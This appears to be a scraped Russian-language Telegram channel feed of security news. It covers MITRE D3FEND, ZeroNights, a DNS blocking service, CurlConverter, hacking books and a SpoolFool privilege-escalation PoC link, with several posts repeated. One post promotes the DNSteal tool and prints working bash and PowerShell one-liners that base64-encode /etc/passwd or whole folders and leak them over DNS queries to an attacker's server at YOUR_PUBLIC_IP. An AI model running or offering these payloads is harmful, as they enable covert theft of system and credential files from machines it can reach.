Audio
Разделить трек по аудидорожкам можно с помощью машинного обучения.
Для примера вырезал вокал Tenor Fly из трека B-boy Stance
https://melody.ml/
Для примера вырезал вокал Tenor Fly из трека B-boy Stance
https://melody.ml/
Forwarded from Codeby
ОБЗОР МАТРИЦЫ MITRE DEF3ND
Доброго времени суток. В прошлой статье я рассматривал MITRE ATT&CK, которая показывает техники, используемые злоумышленниками при атаке. Летом 2021 года корпорация MITRE представила свету новую матрицу. Это не обновленная версия ATT&CK, а матрица DEF3ND.
📌 Читать статью: https://codeby.net/threads/obzor-matricy-mitre-def3nd.79304/
📝 Школа Кодебай |🍿Наш ютуб |👾 Наш дискорд
#security #mitre
Доброго времени суток. В прошлой статье я рассматривал MITRE ATT&CK, которая показывает техники, используемые злоумышленниками при атаке. Летом 2021 года корпорация MITRE представила свету новую матрицу. Это не обновленная версия ATT&CK, а матрица DEF3ND.
📌 Читать статью: https://codeby.net/threads/obzor-matricy-mitre-def3nd.79304/
📝 Школа Кодебай |🍿Наш ютуб |👾 Наш дискорд
#security #mitre
Forwarded from ZeroNights
Новости! Определена стилистика ZeroNights 2022
В этом году стилистика ZeroNights отсылает к эпохе залов аркадных автоматов, 8-битным играм и пиксель-арту.
Вашим проводником в мир ИБ станет 11-я версия Матриша, распадающегося на пиксели. Выполненные с использованием пиксельной графики элементы – это громкий ответ любителей ретроигр на преобладание трехмерной графики.
Готовьтесь. Скоро начнем принимать заявки на доклады.
В этом году стилистика ZeroNights отсылает к эпохе залов аркадных автоматов, 8-битным играм и пиксель-арту.
Вашим проводником в мир ИБ станет 11-я версия Матриша, распадающегося на пиксели. Выполненные с использованием пиксельной графики элементы – это громкий ответ любителей ретроигр на преобладание трехмерной графики.
Готовьтесь. Скоро начнем принимать заявки на доклады.
Иногда единственным способом получить данные с сервера является DNS эксфильтрация.
Есть классная тулза DNSteal, которая поднимет тебе фейковый днс сервер и даст тебе готовый payload который нужно будет запустить на сервере (клиенте).
Пример:
На стороне сервера:
На стороне клиента:
Нагрузка для bash для копирования файла /etc/passwd
Нагрузка для bash для копирования папки
Нагрузка для PowerShell для копирования папки:
https://github.com/m57/dnsteal
Есть классная тулза DNSteal, которая поднимет тебе фейковый днс сервер и даст тебе готовый payload который нужно будет запустить на сервере (клиенте).
Пример:
На стороне сервера:
python dnsteal.py YOUR_PUBLIC_IP -v -b 45 -s 2 -f 15
На стороне клиента:
Нагрузка для bash для копирования файла /etc/passwd
# cp /etc/passwd . ;f=passwd; s=2;b=45;c=0; for r in $(for i in $(base64 -w0 $f| sed "s/.\{$b\}/&\n/g");do if [[ "$c" -lt "$s" ]]; then echo -ne "$i-."; c=$(($c+1)); else echo -ne "\n$i-."; c=1; fi; done ); do dig @YOUR_PUBLIC_IP `echo -ne $r$f|tr "+" "*"` +short +noidnin; doneНагрузка для bash для копирования папки
# for f in $(ls .); do s=2;b=45;c=0; for r in $(for i in $(base64 -w0 $f | sed "s/.\{$b\}/&\n/g");do if [[ "$c" -lt "$s" ]]; then echo -ne "$i-."; c=$(($c+1)); else echo -ne "\n$i-."; c=1; fi; done ); do dig @YOUR_PUBLIC_IP `echo -ne $r$f|tr "+" "*"` +short +noidnin; done ; doneНагрузка для PowerShell для копирования папки:
# $d=«YOUR_PUBLIC_IP»; $s=2; $b=45; Get-ChildItem "." | Foreach-Object {$a=$_.Name; $z = [System.IO.File]::ReadAllBytes($_.FullName); $e = [System.Convert]::ToBase64String($z); $l=$e.Length; $r=""; $n=0; while ($n -le ($l/$b)) { $c=$b; if (($n*$b)+$c -gt $l) { $c=$l-($n*$b) }; $r+=$e.Substring($n*$b, $c) + "-."; if (($n%$s) -eq ($s-1)) { nslookup -type=A $r$a. $d; $r="" } $n=$n+1 } nslookup -type=A $r$a. $d }https://github.com/m57/dnsteal
GitHub
GitHub - m57/dnsteal: DNS Exfiltration tool for stealthily sending files over DNS requests.
DNS Exfiltration tool for stealthily sending files over DNS requests. - m57/dnsteal
SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022–22718)
https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81
PoC: https://github.com/ly4k/SpoolFool
https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81
PoC: https://github.com/ly4k/SpoolFool
Medium
SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022-21999)
In this blog post, we’ll look at a Windows Print Spooler local privilege escalation vulnerability that I found and…
Forwarded from Sys-Admin InfoSec
BLD DNS - Обновление в сторону скорости и безопасности. Краткий отчет.
Уже почти, как полгода открытый превентивный DoT/DoH BLD DNS сервис бесплатно приносит пользу блокируя малварные, фишинговые, трекинговые и рекламные домены, экономя трафик, время и мозговые ресурсы своим пользователям.
За это время были заблокировано множество фишинговых кампаний (типа franken-phish), малварных и рамсомварных компаний (типа Pegasus или Kaseya), про блокировку рекламных и трекинговых доменов говорить наверное и не стоит, можно лишь упомянуть, что их количество превышет 1 миллион поинтов из текущих ~двух.
⚡️ В обшей сложности блокируется ~9%-15% процентов вредоносности из ~10 миллионов запросов в месяц из разных стран мира, это очень радует спасибо всем кто пользуется и привносит вклад в проект .
Что добавилось в этом году:
• новый регион, теперь регионов 4 - Казахстан, Германия, Сингапур, Нидерлады
• несколько сетов по вендорам для нивелирования false-positive срабатываний
• добавлен дуплексный режим DoH (443, 8443)
• надеюсь скоро добавится конструктор сетов блокировок BLD DNS (анонс)
Со своей стороны хочется сделать открытый сервис еще более открытым, доступным, надежным, напомню, что сервис живет благодаря помощи друзей, пользователей, тестировщиков проекта, здесь будет полезна и твоя помощь уважаемый user_name твой вклад, как умственный или временной или финансовый будет неоценим, а твой user_name будет отражен в разделе благодарностей на официальном сайте BLD DNS - https://lab.sys-adm.in 🙂
P.S. Спасибо друзьям из Nitro Team за ряд идей по безопасности проекта.
Всем успехов и добра, с уважением @sysadminkz. Берегите себя. Pace to all ✌️
Forwarded from Mikrotik Ninja
Когда нужно составить сложный запрос в Python Requests на помощь приходит CurlConverter
Кстати, конвертирует он не только для Python. В списке есть также ansible, go, java, node.js, rust и другие
Кстати, конвертирует он не только для Python. В списке есть также ansible, go, java, node.js, rust и другие
Curlconverter
Convert curl commands to code
Utility for converting cURL commands to code
Forwarded from white2hack 📚
Black Hat Python: программирование для хакеров и пентестеров, авторы Джастин Зейтц, Тим Арнольд, 2-е издание, релиз 2022
Во втором издании бестселлера Black Hat Python вы исследуете темную сторону возможностей Python — все от написания сетевых снифферов, похищения учетных данных электронной почты и брутфорса каталогов до разработки мутационных фаззеров, анализа виртуальных машин и создания скрытых троянов.
#book #python
Во втором издании бестселлера Black Hat Python вы исследуете темную сторону возможностей Python — все от написания сетевых снифферов, похищения учетных данных электронной почты и брутфорса каталогов до разработки мутационных фаззеров, анализа виртуальных машин и создания скрытых троянов.
#book #python
Forwarded from white2hack 📚
Black_Hat_Python_программирование_для_хакеров_и_пентестеров,_2_е.pdf
8.9 MB
Black Hat Python: программирование для хакеров и пентестеров, авторы Джастин Зейтц, Тим Арнольд, 2-е издание, релиз 2022
Forwarded from white2hack 📚
Python глазами хакера, коллектив авторов из библиотеки журнала «Хакер», релиз 2022 (полная версия)
Рассмотрены современные интерпретаторы языка Python. Описано устройство reverse shell, файлового вируса, трояна, локера и шифровальщика. Представлены примеры инструментов для автоматизированного сбора информации о компьютере, динамического анализа вредоносного кода, в том числе, с использованием API VirusTotal. Приведены примеры программ для разгадывания капчи, поиска людей на видео, обработки сложных веб-форм, автоматизации iOS. Показано, как написать на Python новый навык для голосового помощника «Алиса» и различные программы для одноплатных компьютеров.
Оригинал
https://xakep.ru/2021/12/14/python-xakep-book/
Издательство БХВ Питер
https://bhv.ru/product/python-glazami-hakera/
#book #python
Рассмотрены современные интерпретаторы языка Python. Описано устройство reverse shell, файлового вируса, трояна, локера и шифровальщика. Представлены примеры инструментов для автоматизированного сбора информации о компьютере, динамического анализа вредоносного кода, в том числе, с использованием API VirusTotal. Приведены примеры программ для разгадывания капчи, поиска людей на видео, обработки сложных веб-форм, автоматизации iOS. Показано, как написать на Python новый навык для голосового помощника «Алиса» и различные программы для одноплатных компьютеров.
Оригинал
https://xakep.ru/2021/12/14/python-xakep-book/
Издательство БХВ Питер
https://bhv.ru/product/python-glazami-hakera/
#book #python